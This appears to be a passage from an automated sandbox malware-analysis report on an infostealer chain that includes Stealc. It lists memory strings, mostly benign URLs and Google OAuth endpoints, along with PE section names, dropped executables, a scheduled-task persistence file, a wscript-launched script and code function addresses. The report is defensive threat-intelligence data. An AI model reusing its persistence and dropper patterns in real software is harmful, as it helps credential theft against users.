                          Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                          Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
                          Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
                          Source: Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                          Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
                          Source: chrome.exe, 0000002B.00000002.2704034525.00002B3C00064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                          Source: chrome.exe, 0000002B.00000002.2771964516.00002B3C00CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2768140159.00002B3C00A18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2759409029.00002B3C002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761091858.00002B3C0060C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2764212832.00002B3C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2366929652.00002B3C00448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2766763338.00002B3C0098B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2307171567.00002B3C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2371146012.00002B3C00EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760940840.00002B3C005C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2759409029.00002B3C002F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                          Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2764406614.00002B3C00848000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2766763338.00002B3C00970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                          Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2764406614.00002B3C00848000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2766763338.00002B3C00970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
                          Source: chrome.exe, 0000002B.00000002.2773346174.00002B3C00E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
                          Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770894499.00002B3C00B84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761019091.00002B3C005F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                          Source: chrome.exe, 0000002B.00000002.2768140159.00002B3C00A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/undo
                          Source: chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2307171567.00002B3C0046C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                          Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                          Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                          Source: chrome.exe, 0000002B.00000002.2760811390.00002B3C0058C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                          Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                          Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.mozilla.org/about/
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/RAM:
                          Source: stealc_default2.exe, 00000011.00000003.2103880354.000000002D5AA000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2231077746.0000000003F00000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                          Source: stealc_default2.exe, 00000011.00000003.2103880354.000000002D5AA000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2231077746.0000000003F00000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/kZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGp
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.c
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/

                          System Summary

                          barindex
                          Source: 33.2.f55899dae2.exe.1c770000.2.raw.unpack, searchX64LPVOIDhierarchy.csLarge array initialization: GetGuidArrayRestrictedSkipVisibilityChecks: array initializer size 440832
                          Source: 33.0.f55899dae2.exe.59408e.1.raw.unpack, searchX64LPVOIDhierarchy.csLarge array initialization: GetGuidArrayRestrictedSkipVisibilityChecks: array initializer size 440832
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeFile dump: service123.exe.18.dr 314617856Jump to dropped file
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: file.exeStatic PE information: section name:
                          Source: axplong.exe.6.drStatic PE information: section name:
                          Source: axplong.exe.6.drStatic PE information: section name: .idata
                          Source: axplong.exe.6.drStatic PE information: section name:
                          Source: random[2].exe.13.drStatic PE information: section name:
                          Source: random[2].exe.13.drStatic PE information: section name: .rsrc
                          Source: random[2].exe.13.drStatic PE information: section name: .idata
                          Source: random[2].exe.13.drStatic PE information: section name:
                          Source: c8908bf20d.exe.13.drStatic PE information: section name:
                          Source: c8908bf20d.exe.13.drStatic PE information: section name: .rsrc
                          Source: c8908bf20d.exe.13.drStatic PE information: section name: .idata
                          Source: c8908bf20d.exe.13.drStatic PE information: section name:
                          Source: random[1].exe.13.drStatic PE information: section name:
                          Source: random[1].exe.13.drStatic PE information: section name: .idata
                          Source: 2dc588f7b5.exe.13.drStatic PE information: section name:
                          Source: 2dc588f7b5.exe.13.drStatic PE information: section name: .idata
                          Source: new_v8[1].exe.13.drStatic PE information: section name: .vmp+
                          Source: new_v8[1].exe.13.drStatic PE information: section name: .vmp+
                          Source: new_v8[1].exe.13.drStatic PE information: section name: .vmp+
                          Source: new_v8.exe.13.drStatic PE information: section name: .vmp+
                          Source: new_v8.exe.13.drStatic PE information: section name: .vmp+
                          Source: new_v8.exe.13.drStatic PE information: section name: .vmp+
                          Source: random[1].exe1.13.drStatic PE information: section name:
                          Source: random[1].exe1.13.drStatic PE information: section name: .rsrc
                          Source: random[1].exe1.13.drStatic PE information: section name: .idata
                          Source: 550b7cfe5f.exe.13.drStatic PE information: section name:
                          Source: 550b7cfe5f.exe.13.drStatic PE information: section name: .rsrc
                          Source: 550b7cfe5f.exe.13.drStatic PE information: section name: .idata
                          Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.drStatic PE information: section name:
                          Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.drStatic PE information: section name: .idata
                          Source: AAKAL78BRQNYOCIR09Y.exe.22.drStatic PE information: section name:
                          Source: AAKAL78BRQNYOCIR09Y.exe.22.drStatic PE information: section name: .idata
                          Source: AAKAL78BRQNYOCIR09Y.exe.22.drStatic PE information: section name:
                          Source: stealc_default2[1].exe.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: stealc_default2.exe.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeFile created: C:\Windows\LuggageRepresentations
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeFile created: C:\Windows\AdditionsSalvation
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeFile created: C:\Windows\SixCream
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeFile created: C:\Windows\HomelessLaser
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeFile created: C:\Windows\ActuallyFtp
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeFile created: C:\Windows\EauOfficial
                          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00C5E44013_2_00C5E440
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00C54CF013_2_00C54CF0
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00C9306813_2_00C93068
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00C87D8313_2_00C87D83
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00C54AF013_2_00C54AF0
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00C9765B13_2_00C9765B
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00C92BD013_2_00C92BD0
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00C9777B13_2_00C9777B
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00C96F0913_2_00C96F09
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00C9872013_2_00C98720
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C81ECC017_2_6C81ECC0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C87ECD017_2_6C87ECD0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8E6C0017_2_6C8E6C00
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8FAC3017_2_6C8FAC30
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C82AC6017_2_6C82AC60
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8B6D9017_2_6C8B6D90
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C824DB017_2_6C824DB0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C9ACDC017_2_6C9ACDC0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C9A8D2017_2_6C9A8D20
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C94AD5017_2_6C94AD50
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8EED7017_2_6C8EED70
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8A6E9017_2_6C8A6E90
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C82AEC017_2_6C82AEC0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8C0EC017_2_6C8C0EC0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C900E2017_2_6C900E20
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8BEE7017_2_6C8BEE70
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C968FB017_2_6C968FB0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C82EFB017_2_6C82EFB0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C820FE017_2_6C820FE0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8FEFF017_2_6C8FEFF0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C826F1017_2_6C826F10
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C960F2017_2_6C960F20
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C88EF4017_2_6C88EF40
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8E2F7017_2_6C8E2F70
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C9268E017_2_6C9268E0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C87082017_2_6C870820
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8AA82017_2_6C8AA820
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8F484017_2_6C8F4840
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8B09A017_2_6C8B09A0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8DA9A017_2_6C8DA9A0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8E09B017_2_6C8E09B0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C93C9E017_2_6C93C9E0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8549F017_2_6C8549F0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C87690017_2_6C876900
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C85896017_2_6C858960
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C89EA8017_2_6C89EA80
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8CEA0017_2_6C8CEA00
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8D8A3017_2_6C8D8A30
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C89CA7017_2_6C89CA70
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8C0BA017_2_6C8C0BA0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C926BE017_2_6C926BE0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C94A48017_2_6C94A480
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8664D017_2_6C8664D0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8BA4D017_2_6C8BA4D0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C88442017_2_6C884420
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8AA43017_2_6C8AA430
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C83846017_2_6C838460
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8145B017_2_6C8145B0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8EA5E017_2_6C8EA5E0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8AE5F017_2_6C8AE5F0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C96855017_2_6C968550
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C87854017_2_6C878540
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C92454017_2_6C924540
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C88256017_2_6C882560
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8C057017_2_6C8C0570
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8446D017_2_6C8446D0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C87E6E017_2_6C87E6E0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8BE6E017_2_6C8BE6E0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C87C65017_2_6C87C650
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C84A7D017_2_6C84A7D0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8A070017_2_6C8A0700
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C81809017_2_6C818090
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8300B017_2_6C8300B0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8FC0B017_2_6C8FC0B0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8EC00017_2_6C8EC000
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8E801017_2_6C8E8010
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C86E07017_2_6C86E070
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8201E017_2_6C8201E0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C90413017_2_6C904130
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C89613017_2_6C896130
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C88814017_2_6C888140
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8F22A017_2_6C8F22A0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8EE2B017_2_6C8EE2B0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C9A62C017_2_6C9A62C0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8EA21017_2_6C8EA210
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8F822017_2_6C8F8220
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8B825017_2_6C8B8250
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8A826017_2_6C8A8260
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8523A017_2_6C8523A0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C87E3B017_2_6C87E3B0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8743E017_2_6C8743E0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C89232017_2_6C892320
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C82834017_2_6C828340
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C96237017_2_6C962370
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C82237017_2_6C822370
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C93C36017_2_6C93C360
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8B637017_2_6C8B6370
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C95DCD017_2_6C95DCD0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8E1CE017_2_6C8E1CE0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C831C3017_2_6C831C30
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C823C4017_2_6C823C40
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C949C4017_2_6C949C40
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C813D8017_2_6C813D80
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C969D9017_2_6C969D90
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8F1DC017_2_6C8F1DC0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C883D0017_2_6C883D00
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C843EC017_2_6C843EC0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C92DE1017_2_6C92DE10
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C97BE7017_2_6C97BE70
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C9A5E6017_2_6C9A5E60
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C841F9017_2_6C841F90
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C93DFC017_2_6C93DFC0
